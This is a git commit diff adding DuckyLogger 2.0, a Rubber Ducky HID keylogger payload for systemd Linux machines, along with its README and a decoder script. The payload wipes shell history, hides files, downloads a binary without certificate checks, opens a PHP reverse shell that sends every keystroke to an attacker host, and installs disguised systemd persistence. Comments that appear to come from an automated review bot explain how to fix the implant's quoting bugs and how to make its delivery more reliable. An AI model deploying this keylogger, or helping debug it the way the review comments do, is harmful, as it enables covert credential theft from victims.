Merge branch 'hak5:master' into master
commit
3a216241d8
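--- a/README.md
+++ b/README.md
@@ -0,0 +1,56 @@
+## About:
+* Title: DuckyLogger 2.0
+* Description: Keylogger, which sends each and every keystroke of the target remotely/locally.
+* AUTHOR: drapl0n
+* Version: 2.0
+* Category: Credentials.
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID.
+
+## DuckyLogger 2.0 is the most efficient version of the original DuckyLogger, which captures every keystroke of the traget and sends it back to the attacker.
+
+### Features:
+* Live keystroke capturing.
+* Detailed key logs.
+* Persistent.
+* Autostart payload on boot.
+
+### What's new ?
+* No trigger from the target's end is required.
+* Completely autostarts the payload on boot.
+* Removed unnecessary script blocks.
+* No need to run two different services.
+
+### Workflow:
+* Encoding payload and injecting it into the target's system.
+* Checks whether the internet is connected to the target system.
+* If the internet is connected, then it sends raw keystrokes to the attacker.
+* Attacker processes raw keystrokes.
+
+### Changes to be made in payload:
+* Replace ip (0.0.0.0) and port number (4444) with your server's ip address and port number on line no. `43`.
+* Increase/Decrease time interval to restart service periodically (default is 5 minutes), on line no. `59`.
+
+### Usage:
+1. Encode payload.txt and inject it into the target's system.
+2. Start Netcat listner on the attacking system:
+
+* `nc -lvp <port number> > <log filename>` use this command to create new a logfile with raw keystrokes.
+* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to an existing log file.
+3. Process raw keystrokes using the DuckyLoggerDecoder utility:
+```
+./duckyLoggerDecoder
+DuckyLoggerDecoder is used to decode raw key strokes acquired by duckyLogger.
+
+Usage:
+Decode captured log: [./duckyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
+
+Options:
+-f Specify the log file.
+-m Select Mode(normal|informative)
+-o Specify an output file.
+-h For this banner.
+```
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n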
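--- a/duckyLoggerDecoder
+++ b/duckyLoggerDecoder
@@ -0,0 +1,50 @@
+usage () {
+echo -e "\nDuckyLoggerDecoder is used to decode raw key strokes acquired by DuckyLogger.\n"
+echo -e "Usage: \nDecode captured logs:\t[./duckyLoggerDecoder -f <log file> -m <mode> -o <output file>]";
+echo -e "\nOptions:"
+echo -e "-f\tSpecify the log file."
+echo -e "-m\tSelect Mode(normal|informative)"
+echo -e "-o\tSpecify an output file."
+echo -e "-h\tFor this banner."
+}
+while getopts o:m:f:h: flag
+do
+case "${flag}" in
+o) output=$OPTARG ;;
+m) mode=$OPTARG ;;
+f) filename=$OPTARG ;;
+h) help=$OPTARG ;;
+*)
+usage
+exit 1
+esac
+done
+
+if [ -z "$output" ] && [ -z "$filename" ]; then
+usage
+exit 1
+fi
+if [ -z "$filename" ]; then
+echo -e "DuckyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
+exit 1
+fi
+if [ -z "$output" ]; then
+echo -e "DuckyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
+exit 1
+fi
+if [ -z "$mode" ]; then
+echo -e "DuckyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
+exit 1
+fi
+if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
+echo -e "DuckyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
+exit 1
+fi
+if [ "$mode" == "normal" ] ; then
+awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
+exit 1
+fi
+if [ "$mode" == "informative" ] ; then
+awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
+exit 1
+fi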
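Review bot: The option loop at `while getopts o:m:f:h: flag` declares `-h` as taking an argument, so a bare `-h` is reported as a missing-argument error and only reaches `usage` through the `*)` arm, while `help=$OPTARG` is never read; change it to `while getopts 'o:m:f:h' flag` with `h) usage; exit 0 ;;`. Both decode branches end in `exit 1` after a successful write, so any wrapper that checks the status (or runs under `set -e`) will treat every run as a failure; those should be `exit 0`. `$filename` and `$output` are unquoted in the awk pipelines and the `>` redirections, so a log path containing spaces or glob characters is split or expanded — write `"$filename"` and `> "$output"`. The file has no shebang (line 1 is `usage () {`) yet relies on `echo -e` and `[ "$mode" == "normal" ]`, which are bash-specific; `#!/usr/bin/env bash` as the first line avoids depending on whichever shell the exec fallback picks. Note for users: the keycode-to-keysym table comes from `xmodmap -pke` on the machine running the decoder, so logs from a target with a different keyboard layout will decode incorrectly unless the analyst's X keymap matches — worth a comment above the awk lines.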
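--- a/payload.txt
+++ b/payload.txt
@@ -0,0 +1,74 @@
+REM Title: DuckyLogger 2.0
+REM Description: Keylogger which sends each and every keystroke of the target remotely/locally.
+REM AUTHOR: drapl0n
+REM Version: 2.0
+REM Category: Credentials
+REM Target: Unix-like operating systems with systemd.
+REM Attackmodes: HID
+
+REM [Note]
+REM Visit https://github.com/drapl0n/DuckyLogger2/README.md for usage and other important instructions.
+
+REM [keeping tracks clear]
+DELAY 500
+CTRL-ALT t
+DELAY 400
+STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+ENTER
+DELAY 100
+
+REM [creating key logging mechanism]
+STRING mkdir /var/tmp/.system
+ENTER
+DELAY 100
+STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/sys
+ENTER
+DELAY 100
+
+REM [importing xinput]
+STRING cd /var/tmp/.system/
+ENTER
+DELAY 100
+STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
+ENTER
+DELAY 2500
+STRING chmod +x xinput
+ENTER
+DELAY 100
+
+REM [creating reverse shell]
+STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+
+REM [creating systemd service to execute payload on boot]
+STRING mkdir -p ~/.config/systemd/user
+ENTER
+DELAY 200
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
+ENTER
+DELAY 100
+
+REM [creating systemd timer unit]
+STRING echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer
+ENTER
+DELAY 100
+
+REM [enabling service]
+STRING systemctl --user daemon-reload
+ENTER
+DELAY 300
+STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
+ENTER
+DELAY 150
+STRING systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
+ENTER
+DELAY 150
+STRING exit
+ENTER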
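Review bot: In the `echo -e "while :\n...` line that writes `/var/tmp/.system/systemBus`, `$?` sits inside double quotes and is expanded by the target's shell when the echo itself runs, so the written file contains a constant such as `if [ 0 -eq 0 ]` and the ping connectivity check the README advertises is never evaluated; it needs to be `\$?`, like the `\$sock` next to it. The same line's `exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"")` has an unescaped `"` right after `exec(` that closes the outer double-quoted string, and as far as the quoting can be traced the file ends up with `exec("/var/tmp/.system/sys -i <&3 >&3 2>&3"");`, which is not valid PHP, so the reverse shell would never start — the intended text is presumably `exec("/var/tmp/.system/sys <&3 >&3 2>&3");`. A more robust way to ship a multi-line script over HID is to pre-encode it and type `echo <base64> | base64 -d > /var/tmp/.system/systemBus`, which removes every shell-quoting and `$`-expansion hazard at once. In the history cleanup line, `rm -f $HISTFILE` runs after `unset HISTFILE`, so the variable is already empty and the existing history file is left on disk; run the `rm` before the `unset`. Separately, the `wget --no-check-certificate` fetch of the `xinput` binary lets anyone on path swap the implant's own tool, and `Type=forking` does not match a script that stays in the foreground (`Type=simple` is the matching type, and `-no-browser` is not an argument the script reads).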